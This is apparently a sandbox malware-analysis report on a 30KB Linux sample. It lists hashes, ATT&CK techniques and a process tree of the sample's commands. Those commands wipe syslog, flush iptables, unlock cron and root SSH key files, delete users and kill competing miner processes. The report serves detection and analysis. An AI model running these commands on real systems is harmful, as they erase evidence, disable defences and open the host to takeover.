7f82d34906c480afefcd26f969b815794f352a95ce280b4ddb0687ff096c6a8b

Analysis

max time kernel
12s
platform
debian-9_armhf
resource
debian9-armhf-20240418-en
resource tags

arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
20-09-2024 03:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eccba1bd0adedf00340c53fd34e800d7_JaffaCakes118
Size

30KB
MD5

eccba1bd0adedf00340c53fd34e800d7
SHA1

7b959de9d793bbc071dad336fd2e4d4cb82c7b0f
SHA256

7f82d34906c480afefcd26f969b815794f352a95ce280b4ddb0687ff096c6a8b
SHA512

116ca660e158a83ae12222aae2b440586604e51e58630a4f12118e1fae760a403d9bf00d7f79e4aad252d268736d699739d4665ee27b4f952a2660fd9c42f508
SSDEEP

384:p7pQBDf6jlpTWg3vMGQiirhHwMyGj4CC9vEKMvU/4Qdre21jT58vKpG2Y0orcfKU:p78zQ5VFNcDAFLcIwgnoYq0xFBVdHtrn

Score

7^/10

defense_evasion discovery evasion privilege_escalation

Malware Config

Signatures

Deletes system logs 1 TTPs 1 IoCs

Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

evasion

Clear Linux or Mac System Logs

T1070.002

description	ioc	Process
File deleted	/var/log/syslog	rm

Flushes firewall rules 1 TTPs 1 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

defense_evasion

Disable or Modify System Firewall

T1562.004

pid	Process
664	iptables

Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs

Abuse sudo or cached sudo credentials to execute code.

privilege_escalation defense_evasion

Sudo and Sudo Caching

T1548.003

pid	Process
670	sudo

Attempts to change immutable files 40 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
652	chattr
724	xargs
736	xargs
798	xargs
806	xargs
681	chattr
742	xargs
748	xargs
830	xargs
877	xargs
705	xargs
712	xargs
718	xargs
730	xargs
784	xargs
808	xargs
885	xargs
869	xargs
654	chattr
754	xargs
760	xargs
790	xargs
802	xargs
857	xargs
682	chattr
796	xargs
810	xargs
844	xargs
890	xargs
897	xargs
661	chattr
694	grep
700	xargs
766	xargs
772	xargs
778	xargs
650	chattr
689	grep
800	xargs
823	xargs

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 14 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill

Process Discovery 1 TTPs 8 IoCs

Adversaries may try to discover information about running processes.

discovery

Process Discovery

T1057

pid	Process
873	ps
881	ps
886	ps
893	ps
688	ps
693	ps
819	ps
826	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/645/cmdline	ps
File opened for reading	/proc/145/cmdline	ps
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/143/status	ps
File opened for reading	/proc/28/stat	ps
File opened for reading	/proc/23/cmdline	ps
File opened for reading	/proc/170/stat	ps
File opened for reading	/proc/110/cmdline	ps
File opened for reading	/proc/213/cmdline	ps
File opened for reading	/proc/20/cmdline	ps
File opened for reading	/proc/98/cmdline	pkill
File opened for reading	/proc/138/cmdline	pkill
File opened for reading	/proc/299/status	ps
File opened for reading	/proc/647/cmdline	ps
File opened for reading	/proc/838/status	ps
File opened for reading	/proc/109/stat	ps
File opened for reading	/proc/143/status	pkill
File opened for reading	/proc/107/cmdline	ps
File opened for reading	/proc/890/cmdline	ps
File opened for reading	/proc/138/status	ps
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/599/status	ps
File opened for reading	/proc/213/stat	ps
File opened for reading	/proc/uptime	ps
File opened for reading	/proc/76/status	pkill
File opened for reading	/proc/836/status	ps
File opened for reading	/proc/655/stat	ps
File opened for reading	/proc/13/stat	ps
File opened for reading	/proc/23/cmdline	pkill
File opened for reading	/proc/148/status	ps
File opened for reading	/proc/145/stat	ps
File opened for reading	/proc/299/status	ps
File opened for reading	/proc/14/cmdline	ps
File opened for reading	/proc/645/status	ps
File opened for reading	/proc/278/status	ps
File opened for reading	/proc/871/stat	ps
File opened for reading	/proc/640/stat	ps
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/7/cmdline	pkill
File opened for reading	/proc/7/cmdline	pkill
File opened for reading	/proc/10/cmdline	pkill
File opened for reading	/proc/24/cmdline	pkill
File opened for reading	/proc/264/cmdline	ps
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/165/status	ps
File opened for reading	/proc/138/status	ps
File opened for reading	/proc/599/cmdline	ps
File opened for reading	/proc/24/stat	ps
File opened for reading	/proc/869/stat	ps
File opened for reading	/proc/15/stat	ps
File opened for reading	/proc/6/cmdline	pkill
File opened for reading	/proc/27/status	ps
File opened for reading	/proc/829/status	ps
File opened for reading	/proc/837/status	ps
File opened for reading	/proc/581/status	ps
File opened for reading	/proc/2/status	ps
File opened for reading	/proc/277/stat	ps
File opened for reading	/proc/14/cmdline	ps
File opened for reading	/proc/11/status	pkill
File opened for reading	/proc/20/cmdline	pkill
File opened for reading	/proc/12/cmdline	ps
File opened for reading	/proc/213/status	ps
File opened for reading	/proc/896/stat	ps
File opened for reading	/proc/165/stat	ps

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/log_rot	eccba1bd0adedf00340c53fd34e800d7_JaffaCakes118

/tmp/eccba1bd0adedf00340c53fd34e800d7_JaffaCakes118
/tmp/eccba1bd0adedf00340c53fd34e800d7_JaffaCakes118
1⤵
- Writes file to tmp directory
PID:647
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  - Deletes system logs
  PID:648
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  - Attempts to change immutable files
  PID:650
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  - Attempts to change immutable files
  PID:652
- /usr/bin/chattr
  chattr -R -i /var/spool/cron
  2⤵
  - Attempts to change immutable files
  PID:654
- /usr/bin/chattr
  chattr -i /etc/crontab
  2⤵
  - Attempts to change immutable files
  PID:661
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:664
- /usr/bin/sudo
  sudo sysctl "kernel.nmi_watchdog=0"
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  PID:670
- /usr/sbin/userdel
  userdel akay
  2⤵
  PID:676
- /usr/sbin/userdel
  userdel vfinder
  2⤵
  PID:679
- /usr/bin/chattr
  chattr -iae /root/.ssh/
  2⤵
  - Attempts to change immutable files
  PID:681
- /usr/bin/chattr
  chattr -iae /root/.ssh/authorized_keys
  2⤵
  - Attempts to change immutable files
  PID:682
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:684
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:686
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:687
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  - Attempts to change immutable files
  PID:689
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:688
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  - Attempts to change immutable files
  PID:694
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:693
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:699
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:698
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:697
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:700
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:705
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:704
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:703
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:702
- /bin/grep
  grep -v -
  2⤵
  PID:711
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:710
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:709
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:712
- /bin/grep
  grep :143
  2⤵
  PID:708
- /bin/grep
  grep -v -
  2⤵
  PID:717
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:716
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:715
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  - Reads runtime system information
  PID:718
- /bin/grep
  grep :2222
  2⤵
  PID:714
- /bin/grep
  grep -v -
  2⤵
  PID:723
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:722
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:721
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:724
- /bin/grep
  grep :3333
  2⤵
  PID:720
- /bin/grep
  grep -v -
  2⤵
  PID:729
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:728
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:727
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  - Reads runtime system information
  PID:730
- /bin/grep
  grep :3389
  2⤵
  PID:726
- /bin/grep
  grep -v -
  2⤵
  PID:735
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:734
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:733
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:736
- /bin/grep
  grep :4444
  2⤵
  PID:732
- /bin/grep
  grep -v -
  2⤵
  PID:741
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:740
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:742
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:739
- /bin/grep
  grep :5555
  2⤵
  PID:738
- /bin/grep
  grep -v -
  2⤵
  PID:747
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:746
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:745
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:748
- /bin/grep
  grep :6666
  2⤵
  PID:744
- /bin/grep
  grep -v -
  2⤵
  PID:753
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:752
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:751
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:754
- /bin/grep
  grep :6665
  2⤵
  PID:750
- /bin/grep
  grep -v -
  2⤵
  PID:759
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:758
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:757
- /bin/grep
  grep :6667
  2⤵
  PID:756
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  - Reads runtime system information
  PID:760
- /bin/grep
  grep -v -
  2⤵
  PID:765
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:764
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:763
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:766
- /bin/grep
  grep :7777
  2⤵
  PID:762
- /bin/grep
  grep -v -
  2⤵
  PID:771
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:770
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:769
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:772
- /bin/grep
  grep :8444
  2⤵
  PID:768
- /bin/grep
  grep -v -
  2⤵
  PID:777
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:776
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:775
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  - Reads runtime system information
  PID:778
- /bin/grep
  grep :3347
  2⤵
  PID:774
- /bin/grep
  grep -v -
  2⤵
  PID:783
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:782
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:781
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:784
- /bin/grep
  grep :14444
  2⤵
  PID:780
- /bin/grep
  grep -v -
  2⤵
  PID:789
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:788
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:787
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:790
- /bin/grep
  grep :14433
  2⤵
  PID:786
- /bin/grep
  grep -v -
  2⤵
  PID:795
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:794
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:793
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:796
- /bin/grep
  grep :13531
  2⤵
  PID:792
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:798
- /bin/cat
  cat /tmp/.X11-unix/01
  2⤵
  PID:797
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:800
- /bin/cat
  cat /tmp/.X11-unix/11
  2⤵
  PID:799
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:802
- /bin/cat
  cat /tmp/.X11-unix/22
  2⤵
  PID:801
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:806
- /bin/cat
  cat /tmp/.pg_stat.0
  2⤵
  PID:805
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:808
- /bin/cat
  cat /tmp/.pg_stat.1
  2⤵
  PID:807
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:810
- /bin/cat
  cat /data/./oka.pid
  2⤵
  PID:809
- /usr/bin/pkill
  pkill -f zsvc
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:812
- /usr/bin/pkill
  pkill -f pdefenderd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:814
- /usr/bin/pkill
  pkill -f updatecheckerd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:817
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:822
- /bin/grep
  grep -v grep
  2⤵
  PID:821
- /bin/grep
  grep ./oka
  2⤵
  PID:820
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:823
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:819
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:830
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:829
- /bin/grep
  grep -v grep
  2⤵
  PID:828
- /bin/grep
  grep "postgres: autovacum"
  2⤵
  PID:827
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:826
- /bin/grep
  grep -v "("
  2⤵
  PID:837
- /bin/grep
  grep -v "\\["
  2⤵
  PID:836
- /bin/grep
  grep -v bin
  2⤵
  PID:835
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:838
- /usr/bin/awk
  awk "length(\$1) == 8"
  2⤵
  PID:834
- /bin/grep
  grep -v proxymap
  2⤵
  PID:839
- /bin/ps
  ps ax -o "command,pid" -www
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:833
- /bin/grep
  grep -v postgres
  2⤵
  PID:840
- /bin/grep
  grep -v postgrey
  2⤵
  PID:841
- /bin/grep
  grep -v kinsing
  2⤵
  PID:842
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:843
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:844
- /bin/grep
  grep -v "("
  2⤵
  PID:851
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:852
- /bin/grep
  grep -v "\\["
  2⤵
  PID:850
- /bin/grep
  grep -v bin
  2⤵
  PID:849
- /usr/bin/awk
  awk "length(\$1) == 16"
  2⤵
  PID:848
- /bin/grep
  grep -v proxymap
  2⤵
  PID:853
- /bin/ps
  ps ax -o "command,pid" -www
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:847
- /bin/grep
  grep -v postgres
  2⤵
  PID:854
- /bin/grep
  grep -v postgrey
  2⤵
  PID:855
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:856
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:857
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:864
- /bin/grep
  grep -v "("
  2⤵
  PID:863
- /bin/grep
  grep -v "\\["
  2⤵
  PID:862
- /bin/grep
  grep -v bin
  2⤵
  PID:861
- /usr/bin/awk
  awk "length(\$5) == 8"
  2⤵
  PID:860
- /bin/grep
  grep -v proxymap
  2⤵
  PID:865
- /bin/grep
  grep -v postgres
  2⤵
  PID:866
- /bin/ps
  ps ax
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:859
- /bin/grep
  grep -v postgrey
  2⤵
  PID:867
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:868
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:869
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:877
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:876
- /bin/grep
  grep /tmp/sscks
  2⤵
  PID:875
- /bin/grep
  grep -v grep
  2⤵
  PID:874
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:873
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:884
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:885
- /bin/grep
  grep -v grep
  2⤵
  PID:883
- /bin/grep
  grep "sleep 60"
  2⤵
  PID:882
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:881
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:890
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:889
- /bin/grep
  grep -v grep
  2⤵
  PID:888
- /bin/grep
  grep ./crun
  2⤵
  PID:887
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:886
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:897
- /usr/bin/awk
  awk "{if(\$3>80.0) print \$2}"
  2⤵
  PID:896
- /bin/grep
  grep -v grep
  2⤵
  PID:895
- /bin/grep
  grep -vw kdevtmpfsi
  2⤵
  PID:894
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:893

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

Clear Linux or Mac System Logs

T1070.002

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/log_rot

Filesize
5B

MD5
727479ef7cedf30c03459bec7d87b0f0

SHA1
2082e7f715f058acab2398d25d135cf5f4c0ce41

SHA256
29872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6

SHA512
4cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads